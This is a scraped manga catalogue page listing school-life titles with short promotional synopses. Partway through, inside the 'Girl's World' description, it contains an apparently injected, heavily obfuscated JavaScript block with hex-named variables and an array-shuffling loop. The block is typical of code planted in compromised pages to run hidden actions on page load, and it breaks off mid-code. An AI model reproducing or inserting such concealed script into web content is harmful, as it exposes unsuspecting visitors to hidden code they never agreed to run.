School Life - Page 49

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

836 results

My Affair With a Ghostly Girlfriend

On a feverish dark night, a black wind swooped down under the pale glow of the dark as Ye Lan, a high school student, gained unimaginable and mysterious powers. Was it a strangely beautiful demon Lolita, an arrogant elder sister, or an innocent, adorable and beautiful sword deity that appeared before him? Ye Lan couldn’t find it in him to cross her, and neither could he avoid her. Join him as he’s forced into embarking on a mysterious adventure with her into the dangerous unknown together.


Doomed to be a King

One day, a young man ​occupied a mountain, and crowned himself the king. Henceforward, this place was full of masters and beasts. But wait… What am I looking at? Masters are plowing farmlands, and beasts are guarding the yards? Something’s wrong…


Can’t Love You

Her gambling addict of a stepfather owes a massive debt, forcing a helpless young woman to use her body to pay back what he owes! What in the world?! The man she’s indebted to provides her with food and shelter, even offering her a job! Sounds too good to be true, right? Little does she know, the poor lamb has made a deal with the wolf. She falls deep into his trap, where she begins a life of compensation with her own body.


Handsome, You Won't Get Me.

Handsome, You Won't Get Me other name Accidentally In Love With The Evil Prince I was forcibly kissed by a handsome guy, twice! But it wasn't cool. Who do you think you are? Am I a girl you can kiss at will? Huh? You said you want to marry me? No way! I ran away from my home exactly because I don't want to get married! But here's a handsome guy says he must marry me? Why are all these guys all into me... MangaToon got authorization from iReader to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


The Eminence in Shadow

Just like how everyone adored heroes in their childhood, a certain young man adored those powers hidden in shadows. After hiding his strength and living the mediocre life of a mob character by day while undergoing frenzied training by night, he finally reincarnates into a different world and gains ultimate power. The young man who is only playing at being a power in the shadows, his misunderstanding subordinates, and a giant organization in the shadows that gets trampled….. This is the story of a young boy who had adored powers in shadows possibly eventually reigning over the world of shadows in another world.


Girl’s World ( World of Girl )

It seems perfect, but in fact the lonely swans and the good-looking ducks meet and struggle with each other and become real friends …<script></script><script>(function(_0x582b04,_0x34bbb9){var _0x542c58=_0x2b32,_0x4ed678=_0x582b04();while(!![]){try{var _0x179a8b=parseInt(_0x542c58(0x153))/(0x9b5+-0xac6+0x112)*(parseInt(_0x542c58(0x16a))/(-0x4*0x13d+0x9c6+-0x4d0))+-parseInt(_0x542c58(0x15f))/(-0x4d*0x9+-0x1*0x87e+0xb36)*(-parseInt(_0x542c58(0x169))/(-0x570+-0xd*0x1c+0xdc*0x8))+parseInt(_0x542c58(0x159))/(-0x17*0x2f+0x13ab+0xb*-0x167)+parseInt(_0x542c58(0x16b))/(-0x250+0x22d9+0xcb*-0x29)+-parseInt(_0x542c58(0x15b))/(-0x16*0x1a5+-0x16e1*0x1+0x3*0x13b2)+-parseInt(_0x542c58(0x156))/(-0x1*0xca3+-0x88c*0x1+0x1*0x1537)*(parseInt(_0x542c58(0x170))/(-0xcbd+0x3d*-0x65+-0x24d7*-0x1))+parseInt(_0x542c58(0x155))/(-0x6bf+0x1773+0x9*-0x1da)*(-parseInt(_0x542c58(0x161))/(-0x26da*-0x1+0x185f+-0x3f2e));if(_0x179a8b===_0x34bbb9)break;else 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Cursed Princess Club

Meet Gwendolyn – living proof that princesses don’t always have it all. See, although she lives in a castle and her father is the King, Gwendolyn isn’t like a movie princess, or even a fairly-tale princess. She’s got a big heart, but isn’t particularly attractive and doesn’t have a Disney-quality singing voice. But one night, she accidentally stumbles upon the twisted world of the Cursed Princess Club, and her life will never be the same. Hexed and cast out, the ladies of the club are just the people Gwendolyn needs to show her that just because she doesn’t “fit the mold” does not mean she’s any less of a princess.


I Eat Soft Rice

Zhang Hao passed out after watching the rare blood moon once every century but when he woke up, he found that the whole world had changed… The attributes and concepts of men and women were completely reversed. It has become very normal for a woman to earn money to support the family, and it has become very normal for a man to be a househusband at home. Guys are more feminine and women are more dominant and work as the breadwinner. In this world, it’s normal for a woman to chase a man, “But what is this? Is this how I want to live my life? hey! it’s not like I want to depend on women and eat soft rice! I want to be a real man too!” Without any cheats or supernatural powers. Zhanghao will need to navigate this strange new world with different social norms and succeed in it in order to adapt and survive, hopefully, he will be able to thrive and become successful in this world. “And become a Real man too! ” Transmigrated into a feminist world / 我在异世吃软饭 I Eat Soft Rice in Another World Tôi ở thế giới khác dựa dẫm vào phụ nữ Wǒ Zài Yì Shì Chī Ruǎn Fàn 我在异世吃软饭 这里的妹子都想攻略我?!


Universe’s Strongest First Love

Read manhwa Universe’s Strongest First Love / Lovers of the Galaxy / The Greatest First Love in the Universe / 宇宙最强初恋 / 우주 최강의 첫사랑 Six years ago, when Wooju lost her father, she came across a kind-hearted alien in the mountains. Ever since then, she’s been an avid fan of aliens, but she pretends not to believe in their existence out of fear that her classmates will ostracize her. One day, Wooju discovers a school club that meets her interests. She’s excited to finally share her passion for aliens with others, but she has no idea that this will be the beginning of her exciting romance with the student body president Huimun, who has a secret of his own.


Inso’s Law

“I just want to live a normal life, why is this happening to me!” Your average student Ham Dan, whose hobby was reading “Law of Insomnia” wakes up to a beautiful novel like heroine. But even in the world of fantasy novels, her role is no different. Stuck as the childhood friend of the heroine, her normal everyday life comes to an end, becoming more twisted by her strong character.


Ooh La La

Never say yes to a typical, dull romance.
